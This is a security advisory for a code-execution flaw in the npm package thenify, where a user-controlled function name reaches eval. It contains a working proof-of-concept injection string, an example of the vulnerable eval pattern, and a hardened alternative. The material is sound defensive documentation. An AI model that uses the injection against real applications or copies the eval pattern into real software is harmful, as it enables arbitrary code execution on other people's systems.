SNYK-JS-THENIFY-571690 PUBLISHED CVSS 8.6 HIGH

## Overview

[thenify](https://www.npmjs.com/package/thenify) promisifies a callback-based function using any-promise.

Affected versions of this package are vulnerable to Arbitrary Code Execution. The `name` of the function provided to the package can be controlled by users and is passed to the `eval` function without any sanitization.

### PoC

```
var a = require("thenify");
var attack_code = "fs=require('fs');fs.writeFile('Song', 'test',function(){})";
function cur(){};
Object.defineProperty(cur, "name", { value: "fake() {" + attack_code + ";})();(function(){//"});
a(cur);
```

## Remediation

Upgrade `thenify` to version 3.3.1 or higher.

## References

- [GitHub Commit](https://github.com/thenables/thenify/commit/0d94a24eb933bc835d568f3009f4d269c4c4c17a)
- [Vulnerable Code](https://github.com/thenables/thenify/blob/master/index.js#L17)
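To make the bug class concrete, here is an added example (not thenify's own code) of a minimal promisify helper that splices a function's `name` into source text handed to `eval`, next to a hardened variant that never lets the name reach an evaluator. The function names `buildSource`, `unsafePromisify`, `isSafeName` and `safePromisify`, and the identifier regex used as the allow-list, are this example's own assumptions, not a description of the upstream fix.

```javascript
// Added example, not code from the thenify project.
// Illustrates the pattern behind SNYK-JS-THENIFY-571690: a wrapper is generated
// from source text that embeds the wrapped function's `name` verbatim.

// Builds the wrapper source. Naming the generated function after the wrapped
// one keeps stack traces readable, but `name` is interpolated unescaped, so any
// text that closes the function header becomes executable code.
function buildSource(name) {
  return '(function ' + name + '(...args) {\n' +
    '  return new Promise(function (resolve, reject) {\n' +
    '    fn.apply(null, args.concat(function (err, value) {\n' +
    '      if (err) reject(err); else resolve(value);\n' +
    '    }));\n' +
    '  });\n' +
    '})';
}

// Vulnerable pattern (kept only to show what the evaluated text looks like):
// `fn.name` is attacker-influenced whenever a caller can define or override it.
function unsafePromisify(fn) {
  return eval(buildSource(fn.name)); // direct eval: `fn` is in scope for the generated text
}

// Allow-list: a plain JavaScript identifier and nothing else (assumption for
// this example). Empty names (anonymous functions) are rejected too.
const IDENTIFIER = /^[A-Za-z_$][A-Za-z0-9_$]*$/;

function isSafeName(name) {
  return typeof name === 'string' && IDENTIFIER.test(name);
}

// Hardened variant: no eval at all. A closure does the work, and the display
// name is attached afterwards through a property descriptor, where it is plain
// data and cannot be interpreted as code.
function safePromisify(fn) {
  if (typeof fn !== 'function') throw new TypeError('expected a function');
  const wrapper = function (...args) {
    return new Promise((resolve, reject) => {
      fn.apply(this, args.concat((err, value) => (err ? reject(err) : resolve(value))));
    });
  };
  const name = isSafeName(fn.name) ? fn.name : 'promisified';
  Object.defineProperty(wrapper, 'name', { value: name, configurable: true });
  return wrapper;
}

// Constructed sample: a callback-style function and a poisoned `name` in the
// shape the advisory's PoC uses (no payload inside, just the header break-out).
function readTwice(x, cb) { cb(null, x * 2); }
function poisoned() {}
Object.defineProperty(poisoned, 'name', { value: 'fake() {/*payload*/;})();(function(){//' });

module.exports = { buildSource, unsafePromisify, isSafeName, safePromisify, readTwice, poisoned };
```

The hardened version removes the evaluator entirely rather than trying to escape the name; the identifier check only decides whether the original name is worth preserving for diagnostics. If source generation cannot be avoided, the same allow-list must run before the name is interpolated, and an anonymous or rejected name should fall back to a fixed literal.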

Risk Scores

CVSS v3.1
8.6
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:P/RL:U/RC:C

